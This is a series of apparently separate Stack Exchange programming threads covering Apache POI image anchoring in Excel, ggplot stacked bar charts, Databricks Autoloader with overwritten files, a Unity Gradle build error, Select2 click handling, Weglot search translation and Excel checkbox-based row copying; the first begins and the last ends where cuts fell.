(sheet instanceof XSSFSheet) { anchor.setDx1((int)Math.round(dx1 * Units.EMU_PER_PIXEL * Units.DEFAULT_CHARACTER_WIDTH / 256f)); } else if (sheet instanceof HSSFSheet) { anchor.setDx1((int)Math.round(dx1 * Units.DEFAULT_CHARACTER_WIDTH / 256f * 14.75 * DEFAULT_COL_WIDTH / colwidth1)); } if (!resize) { anchor.setRow2(row2); //second anchor determines bottom right position if (sheet instanceof XSSFSheet) { anchor.setDy2(dy2 * Units.EMU_PER_POINT); } else if (sheet instanceof HSSFSheet) { anchor.setDy2((int)Math.round(dy2 * Units.PIXEL_DPI / Units.POINT_DPI * 14.75 * DEFAULT_ROW_HEIGHT / rowheight2)); } anchor.setCol2(col2); if (sheet instanceof XSSFSheet) { anchor.setDx2((int)Math.round(dx2 * Units.EMU_PER_PIXEL * Units.DEFAULT_CHARACTER_WIDTH / 256f)); } else if (sheet instanceof HSSFSheet) { anchor.setDx2((int)Math.round(dx2 * Units.DEFAULT_CHARACTER_WIDTH / 256f * 14.75 * DEFAULT_COL_WIDTH / colwidth2)); } } Picture picture = drawing.createPicture(anchor, pictureIdx); if (resize) picture.resize(); return picture; } public static void main(String[] args) throws Exception { Workbook workbook = new XSSFWorkbook(); //Workbook workbook = new HSSFWorkbook(); Sheet sheet = workbook.createSheet("Sheet1"); sheet.setColumnWidth(1, 6000/*1/256th of a character width*/); Row row = sheet.createRow(0); row.setHeightInPoints(100/*points*/); row = sheet.createRow(10); row.setHeightInPoints(50/*points*/); Picture picture; //two cell anchor in the same cell (B1) used without resizing the picture picture = drawImageOnExcelSheet(sheet, 1, 0, 1000/*1/256th of a character width*/, 10/*points*/, 1, 0, 5000/*1/256th of a character width*/, 90/*points*/, "mikt1.png", Workbook.PICTURE_TYPE_PNG, false); //one cell anchor (B3) used with resizing the picture picture = drawImageOnExcelSheet(sheet, 1, 2, 1000/*1/256th of a character width*/, 10/*points*/, 0, 0, 0, 0, "mikt1.png", Workbook.PICTURE_TYPE_PNG, true); //two cell anchor (B10 to B12) used without resizing the picture picture = drawImageOnExcelSheet(sheet, 1, 9, 1000/*1/256th of a character width*/, 10/*points*/, 1, 11, 5000/*1/256th of a character width*/, 10/*points*/, "mikt1.png", Workbook.PICTURE_TYPE_PNG, false); if (workbook instanceof XSSFWorkbook) { workbook.write(new FileOutputStream("image-sutpid.xlsx")); } else if (workbook instanceof HSSFWorkbook) { workbook.write(new FileOutputStream("image-sutpid.xls")); } workbook.close(); } } Found at least the definition of dx and dy for binary *-xls file format. It is defined in 2.5.193 OfficeArtClientAnchorSheet. dx: The value is expressed as 1024th’s of that cell’s width. dy: The value is expressed as 256th’s of that cell’s height. Having that, the code should be like so: import java.io.*; import org.apache.poi.ss.usermodel.*; import org.apache.poi.ss.usermodel.ClientAnchor.AnchorType; import org.apache.poi.util.IOUtils; import org.apache.poi.util.Units; import org.apache.poi.xssf.usermodel.XSSFWorkbook; import org.apache.poi.xssf.usermodel.XSSFSheet; import org.apache.poi.hssf.usermodel.HSSFWorkbook; import org.apache.poi.hssf.usermodel.HSSFSheet; public class CreateExcelWithPictures { private static Picture drawImageOnExcelSheet(Sheet sheet, int col1, int row1, int dx1/*1/256th of a character width*/, int dy1/*points*/, int col2, int row2, int dx2/*1/256th of a character width*/, int dy2/*points*/, String pictureurl, int picturetype, boolean resize) throws Exception { int DEFAULT_COL_WIDTH = 10 * 256; float DEFAULT_ROW_HEIGHT = 12.75f; Row row = sheet.getRow(row1); float rowheight1 = (row!=null)?row.getHeightInPoints():DEFAULT_ROW_HEIGHT; row = sheet.getRow(row2); float rowheight2 = (row!=null)?row.getHeightInPoints():DEFAULT_ROW_HEIGHT; int colwidth1 = sheet.getColumnWidth(col1); int colwidth2 = sheet.getColumnWidth(col2); InputStream is = new FileInputStream(pictureurl); byte[] bytes = IOUtils.toByteArray(is); int pictureIdx = sheet.getWorkbook().addPicture(bytes, picturetype); is.close(); CreationHelper helper = sheet.getWorkbook().getCreationHelper(); Drawing drawing = sheet.createDrawingPatriarch(); ClientAnchor anchor = helper.createClientAnchor(); anchor.setAnchorType(AnchorType.DONT_MOVE_AND_RESIZE); anchor.setRow1(row1); //first anchor determines upper left position if (sheet instanceof XSSFSheet) { anchor.setDy1(dy1 * Units.EMU_PER_POINT); } else if (sheet instanceof HSSFSheet) { anchor.setDy1((int)Math.round(dy1 * Units.PIXEL_DPI / Units.POINT_DPI * 256f / (rowheight1 * Units.PIXEL_DPI / Units.POINT_DPI))); } anchor.setCol1(col1); if (sheet instanceof XSSFSheet) { anchor.setDx1((int)Math.round(dx1 * Units.EMU_PER_PIXEL * Units.DEFAULT_CHARACTER_WIDTH / 256f)); } else if (sheet instanceof HSSFSheet) { anchor.setDx1((int)Math.round(dx1 * Units.DEFAULT_CHARACTER_WIDTH / 256f * 1024f / (colwidth1 * Units.DEFAULT_CHARACTER_WIDTH / 256f))); } if (!resize) { anchor.setRow2(row2); //second anchor determines bottom right position if (sheet instanceof XSSFSheet) { anchor.setDy2(dy2 * Units.EMU_PER_POINT); } else if (sheet instanceof HSSFSheet) { anchor.setDy2((int)Math.round(dy2 * Units.PIXEL_DPI / Units.POINT_DPI * 256f / (rowheight2 * Units.PIXEL_DPI / Units.POINT_DPI))); } anchor.setCol2(col2); if (sheet instanceof XSSFSheet) { anchor.setDx2((int)Math.round(dx2 * Units.EMU_PER_PIXEL * Units.DEFAULT_CHARACTER_WIDTH / 256f)); } else if (sheet instanceof HSSFSheet) { anchor.setDx2((int)Math.round(dx2 * Units.DEFAULT_CHARACTER_WIDTH / 256f * 1024f / (colwidth2 * Units.DEFAULT_CHARACTER_WIDTH / 256f))); } } Picture picture = drawing.createPicture(anchor, pictureIdx); if (resize) picture.resize(); return picture; } public static void main(String[] args) throws Exception { //Workbook workbook = new XSSFWorkbook(); Workbook workbook = new HSSFWorkbook(); Sheet sheet = workbook.createSheet("Sheet1"); sheet.setColumnWidth(1, 6000/*1/256th of a character width*/); Row row = sheet.createRow(0); row.setHeightInPoints(100/*points*/); row = sheet.createRow(10); row.setHeightInPoints(50/*points*/); Picture picture; //two cell anchor in the same cell (B1) used without resizing the picture picture = drawImageOnExcelSheet(sheet, 1, 0, 1000/*1/256th of a character width*/, 10/*points*/, 1, 0, 5000/*1/256th of a character width*/, 90/*points*/, "mikt1.png", Workbook.PICTURE_TYPE_PNG, false); //one cell anchor (B3) used with resizing the picture picture = drawImageOnExcelSheet(sheet, 1, 2, 1000/*1/256th of a character width*/, 10/*points*/, 0, 0, 0, 0, "mikt1.png", Workbook.PICTURE_TYPE_PNG, true); //two cell anchor (B10 to B12) used without resizing the picture picture = drawImageOnExcelSheet(sheet, 1, 9, 1000/*1/256th of a character width*/, 10/*points*/, 1, 11, 5000/*1/256th of a character width*/, 10/*points*/, "mikt1.png", Workbook.PICTURE_TYPE_PNG, false); if (workbook instanceof XSSFWorkbook) { workbook.write(new FileOutputStream("image-sutpid.xlsx")); } else if (workbook instanceof HSSFWorkbook) { workbook.write(new FileOutputStream("image-sutpid.xls")); } workbook.close(); } } But then it would be better having all lengths in measurement unit pixel to avoid the conversion from pt and/or 256'th of a character width to pixels. See Why the same image export excel using HSSFWorkbook can use SXSSFWorkbook can not for example.
common-pile/stackexchange_filtered
stacked bar plot with ggplot I'm trying to make a stacked bar plot with the following dataframe: totalleft 1S 2S 3S 4S 12S 25S tests A-000 5 0 10 10 0 NA A-000 A-001 10 8 10 NA NA NA A-001 A-002 5 3 10 10 10 NA A-002 A-003 2 0 10 9 0 10 A-003 A-004 5 4 10 10 10 NA A-004 A-005 5 3 10 10 10 NA A-005 A-006 8 7 NA 10 10 NA A-006 A-009 9 10 NA NA 10 10 A-009 A-015 NA 1 NA NA NA NA A-015 A-016 NA 0 10 NA 6 9 A-016 A-017 NA 0 NA NA 4 NA A-017 A-020 NA 1 NA NA NA NA A-020 A-025 NA 0 NA NA 0 NA A-025 A-025a NA 0 NA NA 10 NA A-025a A-026 NA 9 10 NA 9 9 A-026 A-027 NA 0 10 NA 2 9 A-027 A-028 NA 0 NA NA 1 NA A-028 A-030 NA 7 NA NA 8 8 A-030 B-000 0 0 7 8 0 0 B-000 B-056 4 0 9 NA 0 5 B-056 B-076 9 9 NA NA 10 10 B-076 B-099 6 5 10 NA 5 9 B-099 B-102 7 0 NA NA 0 10 B-102 B-105 NA 6 NA NA NA 6 B-105 B-119 7 8 10 10 NA NA B-119 However, most of the documentation involves plotting against two factors: one for splitting up the bars along the X axis and the other for dividing up each bar. My questions is how split up the X axis by the factor test and then divide up each bar by the corresponding rows (i.e. 1S,2S,3S,4S,12,25S). So, the first bar would be a bar for A-000, and 20% of the it would be one color (for the 1S, 5/(5+10+10)) and the second 40% would be another color (3S, 10/(5+10+10)) and the final 40% would be a another color (4S, 10/(5+10+10)) I'm using this command as a reference: ggplot(diamonds, aes(clarity, fill=cut)) + geom_bar() from this website: http://docs.ggplot2.org/<IP_ADDRESS>/geom_bar.html# You need to munge the data to make it ggplot friendly. have a look at ?melt from the reshape2 package So you need to reshape the data. You want a stacked barplot, so you will need to tell ggplot about variables 1S, 2S ... and tests. #let's melt the data #library(reshape2) data.plot.m <-melt(data.plot, id.vars = "tests") #I stored your data in data.plot data.plot.m$variable <-gsub("X","",data.plot.m$variable) #as R doesn't like variable names beginning with numbers, #it adds an 'X' automatically when #we load the data with read.table so we remove this from melted data #now we plot the data ggplot(data.plot.m,aes(y = value,x = variable,fill = tests)) + geom_bar(stat = "identity") You will notice the order of the plots are different. We will need to reorder your variable: data.plot.m$variable <- factor(data.plot.m$variable, levels = unique(data.plot.m$variable)) #now plot again ggplot(data.plot.m,aes(y = value,x = variable,fill = tests))+ geom_bar(stat = "identity") I just realized you wanted this instead ggplot(data.plot.m,aes(y=value,x=tests,fill=variable))+geom_bar(stat="identity") and with the x-axis tick labels rotated ggplot(data.plot.m,aes(y=value,x=tests,fill=variable))+geom_bar(stat="identity") + theme(axis.text.x = element_text(angle=90)) Note how I switched x and fill Ahh, yes, this is excellent. One thing though...Can we put the test names on the X axis and the 1S, 2S, etc. as the colors? This seems like what you wanted?? library(reshape2) library(ggplot2) gg <- melt(totalleft,id="tests") ggplot(gg) + geom_bar(aes(x=tests, y=value, fill=variable), stat="identity")+ theme(axis.text.x=element_text(angle=-90, vjust=.2, hjust=0)) melt(...) converts your data frame from "wide" format (groups in different columns) to "long" format (all the values in one column (called value), and groups distinguished by a separate column (called variable).
common-pile/stackexchange_filtered
Dealing with overwritten files in Databricks Autoloader Main topic I am facing a problem that I am struggling a lot to solve: Ingest files that already have been captured by Autoloader but were overwritten with new data. Detailed problem description I have a landing folder in a data lake where every day a new file is posted. You can check the image example below: Each day an automation post a file with new data. This file is named with a suffix meaning the Year and Month of the current period of the posting. This naming convention results in a file that is overwritten each day with the accumulated data extraction of the current month. The number of files in the folder only increases when the current month is closed and a new month starts. To deal with that I have implemented the following PySpark code using the Autoloader feature from Databricks: # Import functions from pyspark.sql.functions import input_file_name, current_timestamp, col # Define variables used in code below checkpoint_directory =<EMAIL_ADDRESS>data_source =<EMAIL_ADDRESS>source_format = "csv" table_name = "prod_gbs_gpdi.bronze_data.sapex_ap_posted" # Configure Auto Loader to ingest csv data to a Delta table query = ( spark.readStream .format("cloudFiles") .option("cloudFiles.format", source_format) .option("cloudFiles.schemaLocation", checkpoint_directory) .option("header", "true") .option("delimiter", ";") .option("skipRows", 7) .option("modifiedAfter", "2022-10-15 11:34:00.000000 UTC-3") # To ingest files that have a modification timestamp after the provided timestamp. .option("pathGlobFilter", "AP_SAPEX_KPI_001 - Posted Invoices in *.CSV") # A potential glob pattern to provide for choosing files. .load(data_source) .select( "*", current_timestamp().alias("_JOB_UPDATED_TIME"), input_file_name().alias("_JOB_SOURCE_FILE"), col("_metadata.file_modification_time").alias("_MODIFICATION_TIME") ) .writeStream .option("checkpointLocation", checkpoint_directory) .option("mergeSchema", "true") .trigger(availableNow=True) .toTable(table_name) ) This code allows me to capture each new file and ingest it into a Raw Table. The problem is that it works fine ONLY when a new file arrives. But if the desired file is overwritten in the landing folder the Autoloader does nothing because it assumes the file has already been ingested, even though the modification time of the file has chaged. Failed tentative I tried to use the option modifiedAfter in the code. But it appears to only serve as a filter to prevent files with a Timestamp to be ingested if it has the property before the threshold mentioned in the timestamp string. It dows not reingest files that have Timestamps before the modifiedAfter threshold. .option("modifiedAfter", "2022-10-15 14:10:00.000000 UTC-3") Question Does someone knows how to detect a file that was already ingested but has a different modified date and how to reprocess that to load in a table? I have figured out a solution to this problem. In the Autoloader Options list in Databricks documentation is possible to see an option called cloudFiles.allowOverwrites. If you enable that in the streaming query then whenever a file is overwritten in the lake the query will ingest it into the target table. Please pay attention that this option will probably duplicate the data whenever a new file is overwritten. Therefore, downstream treatment will be necessary.
common-pile/stackexchange_filtered
What??? Missing argument 'Gradle' in settings.gradle I got an error building my unity project due to an error with the settings.gradle file. See more details here: FAILURE: Build failed with an exception. * Where: Settings file 'C:\Users\educp\Documents\Proyectos de unity\It's Complicated - copia\Library\Bee\Android\Prj\IL2CPP\Gradle\settings.gradle' line: 14 * What went wrong: A problem occurred evaluating settings 'Gradle'. > Could not find method dependencyResolutionManagement() for arguments [settings_9y2goy45mvwak9gvumvg94pgc$_run_closure1@4aecf086] on settings 'Gradle' of type org.gradle.initialization.DefaultSettings. * Try: Run with --stacktrace option to get the stack trace. Run with --info or --debug option to get more log output. Run with --scan to get full insights. * Get more help at https://help.gradle.org BUILD FAILED in 3s Picked up JAVA_TOOL_OPTIONS: -Dfile.encoding=UTF-8 UnityEngine.GUIUtility:ProcessEvent (int,intptr,bool&) When I went to the settings.gradle file it displays this. pluginManagement { repositories { gradlePluginPortal() google() mavenCentral() } } include ':launcher', ':unityLibrary' include 'unityLibrary:GoogleMobileAdsPlugin.androidlib' dependencyResolutionManagement { repositoriesMode.set(RepositoriesMode.PREFER_SETTINGS) repositories { google() mavenCentral() // Android Resolver Repos Start def unityProjectPath = $/file:////$.replace("\\", "/") maven { url "https://maven.google.com/" // Assets/GoogleMobileAds/Editor/GoogleMobileAdsDependencies.xml:7, Assets/GoogleMobileAds/Editor/GoogleUmpDependencies.xml:7 } mavenLocal() // Android Resolver Repos End flatDir { dirs "${project(':unityLibrary').projectDir}/libs" } } } As it shows in the file it doesn't contain the argument Gradle but it seems it have a GoogleMobileAds library. Is this normal?? What is missing?? One more thing, there is an extended version of he problem here: CommandInvokationFailure: Gradle build failed. C:\Program Files\Unity\Hub\Editor\2021.2.6f1\Editor\Data\PlaybackEngines\AndroidPlayer\OpenJDK\bin\java.exe -classpath "C:\Program Files\Unity\Hub\Editor\2021.2.6f1\Editor\Data\PlaybackEngines\AndroidPlayer\Tools\gradle\lib\gradle-launcher-6.1.1.jar" org.gradle.launcher.GradleMain "-Dorg.gradle.jvmargs=-Xmx4096m" "bundleRelease" stderr[ FAILURE: Build failed with an exception. * Where: Settings file 'C:\Users\educp\Documents\Proyectos de unity\It's Complicated - copia\Library\Bee\Android\Prj\IL2CPP\Gradle\settings.gradle' line: 14 * What went wrong: A problem occurred evaluating settings 'Gradle'. > Could not find method dependencyResolutionManagement() for arguments [settings_9y2goy45mvwak9gvumvg94pgc$_run_closure1@4aecf086] on settings 'Gradle' of type org.gradle.initialization.DefaultSettings. * Try: Run with --stacktrace option to get the stack trace. Run with --info or --debug option to get more log output. Run with --scan to get full insights. * Get more help at https://help.gradle.org BUILD FAILED in 3s Picked up JAVA_TOOL_OPTIONS: -Dfile.encoding=UTF-8 ] stdout[ Starting a Gradle Daemon, 1 incompatible Daemon could not be reused, use --status for details ] exit code: 1 UnityEditor.Android.Command.WaitForProgramToRun (UnityEditor.Utils.Program p, UnityEditor.Android.Command+WaitingForProcessToExit waitingForProcessToExit, System.String errorMsg) (at <aa9f40e1a34f4b01ac44d2ce67124834>:0) UnityEditor.Android.Command.Run (System.Diagnostics.ProcessStartInfo psi, UnityEditor.Android.Command+WaitingForProcessToExit waitingForProcessToExit, System.String errorMsg) (at <aa9f40e1a34f4b01ac44d2ce67124834>:0) UnityEditor.Android.Command.Run (System.String command, System.String args, System.String workingdir, UnityEditor.Android.Command+WaitingForProcessToExit waitingForProcessToExit, System.String errorMsg) (at <aa9f40e1a34f4b01ac44d2ce67124834>:0) UnityEditor.Android.AndroidJavaTools.RunJava (System.String args, System.String workingdir, System.Action`1[T] progress, System.String error) (at <aa9f40e1a34f4b01ac44d2ce67124834>:0) UnityEditor.Android.GradleWrapper.Run (UnityEditor.Android.AndroidJavaTools javaTools, Unity.Android.Gradle.AndroidGradle androidGradle, System.String workingdir, System.String task, System.Action`1[T] progress) (at <aa9f40e1a34f4b01ac44d2ce67124834>:0) Rethrow as GradleInvokationException: Gradle build failed UnityEditor.Android.GradleWrapper.Run (UnityEditor.Android.AndroidJavaTools javaTools, Unity.Android.Gradle.AndroidGradle androidGradle, System.String workingdir, System.String task, System.Action`1[T] progress) (at <aa9f40e1a34f4b01ac44d2ce67124834>:0) UnityEditor.Android.PostProcessor.Tasks.BuildGradleProject.Execute (UnityEditor.Android.PostProcessor.PostProcessorContext context) (at <aa9f40e1a34f4b01ac44d2ce67124834>:0) UnityEditor.Android.PostProcessor.PostProcessRunner.RunAllTasks (UnityEditor.Android.PostProcessor.PostProcessorContext context) (at <aa9f40e1a34f4b01ac44d2ce67124834>:0) Rethrow as BuildFailedException: Exception of type 'UnityEditor.Build.BuildFailedException' was thrown. UnityEditor.Android.PostProcessor.CancelPostProcess.AbortBuild (System.String title, System.String message, System.Exception ex) (at <aa9f40e1a34f4b01ac44d2ce67124834>:0) UnityEditor.Android.PostProcessor.PostProcessRunner.RunAllTasks (UnityEditor.Android.PostProcessor.PostProcessorContext context) (at <aa9f40e1a34f4b01ac44d2ce67124834>:0) UnityEditor.Android.PostProcessAndroidPlayer.PostProcess (UnityEditor.Modules.BuildPostProcessArgs args, AndroidPlayerBuildProgram.Data.AndroidPlayerBuildProgramOutput buildProgramOutput) (at <aa9f40e1a34f4b01ac44d2ce67124834>:0) UnityEditor.Android.AndroidBuildPostprocessor.PostProcess (UnityEditor.Modules.BuildPostProcessArgs args, UnityEditor.BuildProperties& outProperties) (at <aa9f40e1a34f4b01ac44d2ce67124834>:0) UnityEditor.PostprocessBuildPlayer.Postprocess (UnityEditor.BuildTargetGroup targetGroup, UnityEditor.BuildTarget target, System.Int32 subtarget, System.String installPath, System.String companyName, System.String productName, System.Int32 width, System.Int32 height, UnityEditor.BuildOptions options, UnityEditor.RuntimeClassRegistry usedClassRegistry, UnityEditor.Build.Reporting.BuildReport report) (at <52409df47eec4ff4a3e5a5be37682d54>:0) UnityEngine.GUIUtility:ProcessEvent(Int32, IntPtr, Boolean&) Does this answer your question? gradle error Could not find method dependencyManagement() One solution is to use Unity 2022.3 or higher. For older versions, you will need to do the following: Go to Assets/Plugins/Android directory and delete gradleTemplate, mainTemplate and settingsTemplate files. (Or move somewhere as backup). Go to Edit -> Project Settings... -> Player Open Android tab and then open Publishing Settings Tick Custom Main Gradle Template and Custom Gradele Properties Template Assets -> External Dependency Manager -> Android Resolver -> Force Resolve You most likely opened a project that was created in newer Unity version. Your Unity 2021.2.6f1 depends on a very old Gradle version that doesn't have dependencyResolutionManagement(). By deleting gradle templates and generating them again, Unity will generate templates that are correct for the current version. dependencyResolutionManagement was added in Gradle 6.8 and your unity version uses Gradle 6.1.1 source This is helpful!! Look, what happened is that the first version of the project was in 2021.2.6f1 but then I decided to upgrade the version to 2022.3.15f1. The thing is that time later I installed an external library asset and when I wanted to build the first time in the latest version It started to give me another error. So I passed the 2022.3 project to 2021.2.6f1 just to see if that solved my problem but as you see it doesn't help. Happily, I made a backup of the 2022.3 version so I can send you the error I get but I don't know where to send you because the message is too long. Try doing the same. Delete 'Template' files from Assets/Plugins/Android and then regenerate them from Settings. Older Unity versions cannot upgrade gradle templates automatically, and this needs to be done every time when Unity changes gradle configuration files. If it doesn't help and if the error is different, you can create a new question and leave a link to it. I just followed your steps and it gave me a new error but I think it is much more readable. The link is here . It says that I have to add a code to the build.gradle file but I'm not quite sure if this is what is needed. I want to thank you for helping me with this and I would be very pleased if you could read the post. Go to Unity->Edit->Preferences and make sure that gradle used is the one installed with Unity (or newer). In my case, although I had installed clean new Unity install, the checkbox for gradle was unchecked and pointing to older gradle for older project I have
common-pile/stackexchange_filtered
How do I check Approvals != null in formula field on Quote object in salesforce How do I check, in formula field on Quote object, Approvals != null. I can see in related list that there are 2 Approvals. This cannot be done with a formula alone, since formulas have no way to access child records. Some other component (process builder, trigger, workflow rule with a cross-object field update, rollup summary field) would be required to get the data onto your parent record (Quote, in this case). Hi @derek thanks for the explanation.
common-pile/stackexchange_filtered
Mercurial Queues, patch is getting auto applied I have two patches: patch1 patch2 When I apply patch1, that is the only thing that gets applied. When I do hg qpop and then do hg qpush patch2, for some reason patch1 gets applied too. How can I make them independent from each other? You need to use the --move option for that. For example: hg qpush --move patch2 This will apply only patch2, but not any patches on top of it.
common-pile/stackexchange_filtered
select2 - Get the value of the clicked box In my Select2 multi-select boxes I want to be able to click on the selected boxes and getting their corresponding option value (or object). This is (in a nutshell) what I have so far: $('#mySelect2').next('span').find('ul').on('click', '.select2-selection__choice', function (e) { console.log($('#mySelect2').select2('data')); alert($(this).data('select2-id')); }); I searched the select2 data objects but there is nothing related to the clicked box and the select2-id data attribute seems to be random. Where can I find some matching id ? I think I've found a workaround solution. It seems that select2 uses the title attribute in the rending list. So the trick is to use this attribute as an id in each option. <select multiple id="states" name="states[]" class="select2"> <option title="states-AL" value="AL">Alabama</option> <option title="states-CA" value="CA">California</option> <option title="states-MI" value="MI">Michigan</option> <option title="states-UT" value="UT">Utah</option> <option title="states-WY" value="WY">Wyoming</option> </select> $('#states').next('span').find('ul').on('click', '.select2-selection__choice', function (e) { alert($(this).attr('title')); }); Can try the below code, use select2 - select and unselect event. $("#mySelect2").on("select2:select select2:unselect", function (e) { //get all items by, for multiple an array like ["9", "20"] will be returned var items= $(this).val(); //Last selected value var lastItem = e.params.data.id; })
common-pile/stackexchange_filtered
Translate back to english before sending the search parameter using weglot I am using Weglot in my single-page application (Angular). The following code adds a language switcher in my application on all pages. <script type="text/javascript" src="https://cdn.weglot.com/weglot.min.js"></script> <script> Weglot.initialize({ api_key: 'YOUR_API_KEY' }); </script> Initially, the application is rendered in English and the user can switch it to any other language using language switcher. Now, there is some data displayed in an angular grid that has a search option to perform server side search. Let's say the user has switched from 'English' to 'French'. There is a word 'Submitted' which is translated to 'Soumis'. The user is trying to search the word 'Soumis' in the search box. As soon as the user stops typing, there will be an API call sent to the server to fetch the results according to the search criteria. I want to translate back 'Soumis' to 'Submitted' before making the API call. The weglot provides APIs for doing this by using the translate function. Weglot.translate( { 'words':[ { "t":1,"w": "Soumis" } ], 'languageTo':'en' } , function(data) { console.log(data) } ); Now here comes the tricky part. The search is triggered when the user types in atleast 3 characters and then stops typing in. Let's say the user started typing 'Sou' which should match with the word 'Soumis' in the French language but if I translated back 'Sou' to the English, it translates it to 'Penny' instead of matching with a substring of 'Submitted'. Now I think I cannot rely on the translate function instead I should build custom logic to achieve this. When I change the language from the language switcher, I can see in the 'Network' tab that there is a XHR call to the weglot server which takes 'original text as input' and returns 'original and translated text as output'. If I get control of this response and manage to store it in local storage then I can write the custom logic. Now if the user searches for 'Sou', I can find this in the saved response translated array. If any match is found, I can find its original word and send it to the API. So in short, I am looking for a solution which is provided by the weglot to handle this. If not, then share me few pointers to store the response from the API which is triggered on change of language from the switcher. I am also open to switching to any other tool like 'Lokalise' if they provide a solution to this. isn't better to give suggestions to user for their input in this case with an autocomplete so that they enter the actual word instead of a shorten version of it? and based on the language of the website suggestions change? @CanGeylan, this is not an autocomplete input box so I cannot give the suggestions to the user. Even if I make an autocomplete input box, still the challenge will remain the same. If the user is searching for 'Sou' then I have to suggest him 'Soumis' which is not possible because Weglot doesn't provide an object having all translations which can be used for searching. Any idea how can I access the response of the API(weglot api) which gets called on change of the language? Are you still experiencing the same issue with the translate search method? If you do, as you may already know, the Search feature actually works as a "Translate Back" so the default search system (in the original language) always takes care of the Search feature. You can notice that the feature works when you have, into your Translation List, translations from your translated language to your original one. For instance, you manage a site in English with a French translation. If the original content is "Hello", Weglot generates the translation "Bonjour" for the French translation. By searching for the word "Bonjour" for example, Weglot will translate the word "Bonjour" from French to English. There will, therefore, be into the Translation List, a language pair FR > EN to translate back the word of the search (in addition to the language pair EN > FR) NB: Weglot's "translate back" must match the original word! For example, by searching for the word "Hello", Weglot could create a translation "Hi" and not "Hello". The search would therefore not be able to match the "Hello" with the "Bonjour". In this case, by editing the translation of "Hi" by "Hello", the search system would work. In your case, maybe the Weglot.search() function could be helpful. I'm pleased to send you below the documentation related to this function https://developers.weglot.com/javascript/javascript-functions#weglot.search-term-callback-boolean In this function you can submit a string as argument and the function will send true if you're currently navigating on a translated version. The search query will then be submitted and stored into your Translation List, in the searched language pair, i.e the language pair from your translated language to your original language. Can this method help you submit the search query only once the query is entirely entered? See an example here Weglot.search("searched query", function(data) {{console.log(data)}})
common-pile/stackexchange_filtered
How do I copy multiple rows to another sheet based on selection with checkboxes in Excel? This is a screen clip of 2 sheets in Excel 2013. What I am trying to do is that if the checkbox corresponding with the row is checked, the text in the row shows up in the second sheet. There will be around 75 rows of text with checkboxes. Some number of these will be checked, and for each one checked, the text should show up on the second sheet (with the displayed rows contiguous; all of the text cells for the row copied but not the checkbox). I have gotten as far as inserting the checkbox, assigning it to a column to show true/false that I will hide later, and trying to use a VLOOKUP. The problem is it just outputs the first value checked. What I need help with is making this work for multiple checkboxes. When I input it with multiple IF functions, it only shows the output for the first checked box and nothing past it. I have tried formulas such as: =VLOOKUP(TRUE,TEKS!$A$2:$K$77,4) or =IF(VLOOKUP(TRUE,TEKS!$A$2:$K$77,4)=A1,VLOOKUP(TRUE,OFFSET(TEKS!$A$2:$K$77, 1, 0),4)) These I know do not work, but they are my best attempts. I figure that if I am able to get the cells from column D of the first sheet, I can get the other columns with an if statement. Please explain more precisely what result you want and show what you have tried (and tell us exactly what result that is giving you). It is hard to envision your problem from the description. Can you post a screenshot somewhere with a link here? https://dl.dropboxusercontent.com/u/78552577/excel%20question.pdf In the link it shows a screen clip of 2 sheets. What I would like is that if the checkbox corresponding with the row is checked it shows up in the second sheet. I have got as far as inserting the checkbox, assigning it to a column to show true false that I will hide later, and trying to use a VLOOKUP. The problem is it just outputs the first value checked. I want it to paste the row in the new sheet. Sorry if this is not clear; I am very new to excel Thanks @Clayjoe: It looks like the bottom half of the image is supposed to be the results you're currently getting. Your description sounds like you got farther than that. Can you add samples of your formulas to the question? Can I assume that the goal is for the copied rows to be contiguous on the output (if you have say five random rows checked, those will be the first five rows on the output sheet, as opposed to a duplicate of the sheet except the 70 unchecked rows are hidden in place)? BTW, you need to "address" comments like I did on this one or nobody will be aware of your posting. In your example, you have three columns of text. Do you want to carry the same structure to the output, or are you looking to have it all consolidated into one cell for the row? The type, length, and internal structure of the text would make it impractical to try to retain that if you combine it into a single cell. @fixer1234 : I believe you understand what I am trying to do perfectly. The formula I am trying to use is as such:=VLOOKUP(TRUE,TEKS!$A$2:$K$77,4) or =IF(VLOOKUP(TRUE,TEKS!$A$2:$K$77,4)=A1,VLOOKUP(TRUE,OFFSET(TEKS!$A$2:$K$77, 1, 0),4)). These I know do not work, but they are my best attempts. I do not need them in one cell; I figure that if I am able to get the cells from column D of the first sheet, I can get the other columns with an if statement. And thank you for the tip about addressing comments. @Clayjoe: I've got to run but I'll leave a few hints to get you started. There are many ways to approach this. You can sort or filter based on the checkbox and then copy and paste. This Q&A might help: http://superuser.com/questions/873257/how-do-i-copy-list-to-another-spreadsheet-only-if-items-have-been-paid/873261#873261 or http://superuser.com/questions/219125/how-do-i-select-a-set-of-specific-cells-and-then-copy-their-entire-row. This approach is "one-time", you do it once after all selections have been made. cont'd... This might also be helpful: http://superuser.com/questions/833255/how-can-i-create-a-list-in-sheet1-made-up-of-selections-on-sheet2-in-excel. You can pre-populate formulas in the second sheet that detect relevant selections based on the checkmarks and display the text. This approach will remain blank until there is something to display and then fill in sequential rows as nneded. If you add checkmarks anywhere, it will auto-update. This link isn't a canned solution but it describes the approach: http://superuser.com/questions/817400/i-need-help-for-a-quote-form-i-am-creating. Another: VBA. @fixer1234: That did the trick. Thanks for your help and patience. I copied all of the "master" sheet except the check marks and True/False columns. I made a new column with a simple "='master'A1" function for the T/F column from the "master" and did a filter on the new column. This worked for one time filtering, which is not what I wanted, so I searched the web and found a code that auto-refreshes the filter whenever there is a change to the sheet. And that worked great, although I do not like adding code if I can help it. Thanks again. @FIXER1234: Update: I ditched the Filter, becuase it had to use macro code and could not be put into a drop-down list. I ended up using this code:=IFERROR(INDEX($E$2:$E$73, AGGREGATE(15,6,(ROW($E$2:$E$73)-ROW($D$2)+1)/($E$2:$E$73<>""),ROWS(I$2:I2))),"") many many times in order to receive the correct information and consolidate it into a nice column where I could make a list, put the info into one column, and show the info on its own sheet without the user needing to know. https://www.youtube.com/watch?v=6PcF04bTSOM this is where I found this code. Thanks again for all your help. @Clayjoe: If you're ambitious, consider writing up your solution as an answer for others who have a similar problem. Try to use a hidden row/column where you evaluate the individual "X"s and if "true" place a text you like to see for each. Then on the result cell, you just combine the output: Row example: =A1 & B1 & C1 ... -or- Column example: =A1 & A2 & A3 ... UPDATE (to address comment): The "IF" function has three parameters, two of which are optional =IF(criteria [, true statement][, false statement]) If you do not include any of the optional statements it will return the words TRUE or FALSE depending on the outcome. So, if you like to have a specific text returned, you need to put it in surrounded by quotation marks. If you want to have nothing returned (e.g. when the criteria is not met), you can use an empty string: =(B1="ABC", "X", "") This will return "X" whenever "B1" is filled with the text "ABC" (true statement). For any other value in cell "B1", it will return an 